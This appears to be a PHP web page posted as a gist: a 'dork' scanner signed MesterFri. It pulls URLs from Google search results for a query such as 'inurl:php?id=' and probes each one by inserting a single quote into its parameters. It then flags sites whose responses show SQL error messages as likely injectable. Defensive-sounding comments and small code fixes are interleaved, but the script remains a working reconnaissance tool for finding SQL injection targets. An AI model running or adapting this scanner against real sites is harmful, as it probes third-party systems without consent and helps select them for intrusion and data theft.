Last active
July 12, 2016 05:24
Script Scanner dork SQLi >> Exploit by MesterFri
<!-- | |
############## | |
# MesterFri # | |
############## | |
//--> | |
<?php | |
// Runtime setup: no execution time limit, a 64 MB memory cap, and a UTF-8 HTML response header.
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');

/*
 * Error fragments that check_injection() searches for in a fetched response body.
 *
 * Defender's view: every entry is text an application only emits when raw database
 * or PHP errors reach the client. Keeping error output server-side (logging instead
 * of displaying) and using parameterized queries removes the signal this list keys on.
 * Several entries (division by zero, session_start(), getimagesize(), ...) are generic
 * PHP errors and say nothing about SQL handling.
 *
 * 'Warning getimagesize()' and 'Warning mysql_result()' appear twice in the original
 * list; the duplicates are kept so the array is unchanged.
 */
$error = array(
    'You have an error in your SQL',
    'supplied argument is not a valid MySQL result resource in',
    'Division by zero in',
    'Call to a member function',
    'Microsoft JET Database',
    'ODBC Microsoft Access Driver',
    'Microsoft OLE DB Provider for SQL Server',
    'Unclosed quotation mark',
    'Microsoft OLE DB Provider for Oracle',
    'Incorrect syntax near',
    'SQL query failed',
    'Warning mysql_fetch_assoc()',
    'Warning mysql_fetch_array()',
    'Warning session_start()',
    'Warning getimagesize()',
    'Warning is_writable()',
    'Warning getimagesize()',
    'Warning Unknown()',
    'Warning mysql_result()',
    'Warning pg_exec()',
    'Warning mysql_result()',
    'Warning mysql_num_rows()',
    'Warning mysql_query()',
    'Warning array_merge()',
    'Warning preg_match()',
    'Warning filesize()',
    'Warning require()',
);
/**
 * Flush pending output to the client so results appear while the script is still running.
 *
 * Calls ob_flush() for PHP's output buffer, then flush() for the system write buffer.
 */
function letItBy()
{
    ob_flush();
    flush();
}
/**
 * Request one page of web-search results for $query and return the decoded result list.
 *
 * The request goes through http_get() with its one-second delay enabled.
 * NOTE(review): the endpoint addressed here is Google's legacy AJAX Search API, which
 * Google deprecated; confirm whether it still responds before reading anything into
 * this function's output.
 *
 * @param string $query Search expression; URL-encoded before it is appended to the URL.
 * @param int    $page  Page number; the result offset sent is $page * 8.
 *
 * @return array|false The 'results' list of the response, or false when the response
 *                     status is not 200 or the page holds no results.
 *
 * Ends the whole script with die() when the decoded response carries no
 * 'responseStatus' key (for example when the body is not valid JSON).
 */
function google_that($query, $page = 1)
{
    $pageSize = 8; // the original author notes 8 as the API's maximum results per page
    $offset = $page * $pageSize;
    $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$pageSize}&start={$offset}&q=" . urlencode($query);

    // Fetch and decode into an associative array.
    $response = json_decode(http_get($url, true), true);

    // No status field at all: the author treats this as fatal and points to
    // http://code.google.com/intl/iw/apis/websearch/docs/ for the API description.
    if (!isset($response['responseStatus'])) {
        die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url);
    }

    // Any status other than 200 ends the search quietly.
    if ($response['responseStatus'] != '200') {
        return false;
    }

    // An empty page is reported the same way as a failed one.
    $hits = $response['responseData']['results'];
    if (count($hits) == 0) {
        return false;
    }

    return $hits;
}
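/**
 * Perform an HTTP GET with cURL and return the response body.
 *
 * Fixes over the original: curl_close() sat after the return statement (unreachable)
 * and was called without the handle, so the handle was never released explicitly;
 * a failed curl_init() is now reported as false instead of being passed to curl_setopt().
 *
 * Behaviour worth knowing when reading callers:
 *  - redirects are followed (CURLOPT_FOLLOWLOCATION), so the body may come from a
 *    different host than the one in $url;
 *  - only the connect phase has a timeout (10 s); no overall transfer timeout is set;
 *  - the body is whatever the remote host sends and must be treated as untrusted.
 *
 * @param string $url      Address to fetch.
 * @param bool   $safemode When strictly true, sleep one second before the request
 *                         (the author's rate-limit courtesy towards the search API).
 *
 * @return string|false Response body, or false when the handle cannot be created
 *                      or the transfer fails.
 */
function http_get($url, $safemode = false)
{
    if ($safemode === true) {
        sleep(1);
    }

    $handle = curl_init($url);
    if ($handle === false) {
        return false;
    }

    curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
    curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($handle, CURLOPT_HEADER, 0);         // body only, no response headers

    $body = curl_exec($handle);
    curl_close($handle);

    return $body;
}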
/**
 * Report whether a modified copy of $url returns a page containing a known error string.
 *
 * The copy is made by turning every "=" in $url into "='" and fetching it with
 * http_get(); the body is then matched, case-insensitively, against the global
 * $error list joined with "|".
 *
 * Defender's view:
 *  - In access logs this shows up as a GET in which each "=" of the query string is
 *    immediately followed by a single quote, sent once per URL.
 *  - A positive result only means one of the listed strings appeared in the body;
 *    the list includes generic PHP errors, so it is not proof of an injectable query.
 *  - Parameterized queries and not displaying errors to clients leave nothing for
 *    this check to find.
 *
 * @param string $url Address to test.
 *
 * @return int|false Result of preg_match(): 1 on a match, 0 on none, false on a regex error.
 */
function check_injection($url)
{
    $probeUrl = str_replace("=", "='", $url);
    $body = http_get($probeUrl);

    // The list entries are joined as-is into the pattern.
    $pattern = '#' . implode("|", $GLOBALS['error']) . '#i';

    return preg_match($pattern, $body);
}
?> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta name="Content-Type" content="text/html; charset=UTF-8"> | |
<title>SQL Exploit</title> | |
<style type="text/css"> | |
body{ background-color:black ; font: normal 5px Times New Roman; color:red;} | |
input{ border-width:5px; padding:8px; width:300px; } | |
a{ text-decoration:none; color:black;} | |
#button{ width:63px;} | |
#result{margin:20px;} | |
#result span{display:block;} | |
#result .Y{background-color:blue;} | |
#result .X{background-color:;} | |
</style> | |
</head> | |
<body> | |
<style> | |
body{ | |
font-family: "Times New Roman", cursive; | |
background-color: #000000; | |
text-shadow:0px 0px 1px #FF0000; | |
} | |
table{ | |
border: 1px #FF0000; | |
} | |
input,select,textarea{ | |
border: 1px #00ff00 solid; | |
-moz-border-radius: 5px; | |
-webkit-border-radius:5px; | |
border-radius:5px; | |
} | |
</style> | |
<center><h1><font color="Lime" face="Times New Roman" size="+4">F</font><font color="Lime" face="Times New Roman" size="+2">ri </font><font color="Lime" face="Times New Roman" size="+4"> - D</font><font color="Lime" face="Times New Roman" size="+2">ork </font><font color="lime" face="Times New Roman" size="+4">E</font><font color="lime" face="Times New Roman" size="+2">xploit</font><font color="blue" face="Times New Roman" size="+4"> SQL</font><br><br> | |
<center> <form method="post"> | |
<slect onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;"><!-- developed by Afla-Youssef Don't remove Copyright pleass --> | |
<input type="text" id="dork" name="dork" style="background-color: black; color: red; font-size: 15px; font-family: courier new;" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:php?id='; ?>" /> | |
<br> | |
<input type="submit" value="Start" id="button" style="background-color: black; color: blue; font-size: 15px; font-family:Times New Roman;" onclick="show_alert();"/> | |
<script> | |
// Click handler of the submit button: shows a notice before the form is posted.
function show_alert() {
    alert(" Exploit Dork Start ^_^");
}
</script> | |
</form></center> | |
<?php | |
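/*
 * Request handler: runs when the form posts a non-empty 'dork' value, pages through
 * google_that() (up to 10000 pages, stopping at the first page that returns false)
 * and prints one row per result, marked by the outcome of check_injection().
 *
 * Fix over the original: the result URL and title come from a remote response and
 * were written into the page unescaped, so markup in either field would run in the
 * browser of whoever views this page. Both are now HTML-escaped before output.
 *
 * Exposure notes for anyone who finds this file on a host they run:
 *  - the form has no authentication and no CSRF token, so any visitor (or any page
 *    that can make a visitor's browser POST here) can start the loop;
 *  - every result triggers an outbound request from this server, with no time limit
 *    set for the script, so the requests are attributed to the hosting machine.
 */
if (isset($_POST['dork']{0})) {
    echo '<div id="result"><center> Search... MesterFri</center><br>';
    letItBy();

    for ($googlePage = 1; $googlePage <= 10000; $googlePage++) {
        $googleResult = google_that($_POST['dork'], $googlePage);
        if (!$googleResult) {
            echo '<center>google dont heve more result, so I done..(?)</center>';
            break;
        }

        foreach ($googleResult as $entry) {
            $rawUrl = $entry['unescapedUrl'];

            // Class "Y" marks a response that contained a listed error string, "X" one that did not.
            $cssClass = check_injection($rawUrl) ? 'Y' : 'X';

            // Escape for the attribute and text contexts they are written into.
            $safeUrl = htmlspecialchars($rawUrl, ENT_QUOTES, 'UTF-8');
            // Presumably the API already entity-encodes titles (TODO confirm); double
            // encoding is disabled so existing entities are left as they are.
            $safeTitle = htmlspecialchars($entry['titleNoFormatting'], ENT_QUOTES, 'UTF-8', false);

            echo "<span class=\"{$cssClass}\"><a href=\"{$safeUrl}\" target='_blank'>{$safeTitle}</a></span>\n";
            letItBy();
        }
    }

    echo '</div>';
}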
?> | |
<center><font color="blue" face="Times New Roman" size="+2">M</font><font color="blue" face="Times New Roman">ester</font><font color="blue" face="Times New Roman" size="+2">F</font><font color="blue" face="Times New Roman">ri</font> | |
</body> | |
</html> |